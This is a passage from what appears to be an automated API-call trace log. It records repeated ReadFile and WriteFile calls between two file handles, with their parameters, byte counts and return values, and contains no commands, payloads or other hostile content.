(in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.900] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x30f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.901] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.901] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.902] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.902] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x322, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.903] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.903] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3b9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.904] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.904] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x387, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.905] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.905] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.906] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.906] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.908] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.908] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.909] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x145, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.909] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.910] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x32e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.910] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.911] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.911] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.912] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x34d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.912] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.913] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.913] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.914] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x235, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.914] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.915] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.915] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.916] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.916] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.917] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.917] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.918] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.918] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.919] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x242, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.919] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.920] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x239, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.920] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.921] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x224, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.921] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.922] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.922] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.923] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.923] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.924] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.924] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.924] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.925] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.925] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x233, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.926] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.927] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.927] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.928] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x223, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.928] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.929] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x236, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.929] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.930] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.930] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.930] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x256, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.931] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.931] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.932] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.932] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1e5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.933] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.933] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.934] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.934] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.935] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.935] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.936] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.936] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.937] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.937] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.938] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.938] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.939] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.939] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x255, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.940] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.940] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.941] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.941] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.942] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.942] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.942] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.943] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.943] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.944] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.944] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.945] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.945] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.946] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x258, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.946] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.947] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.947] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.948] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.948] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, 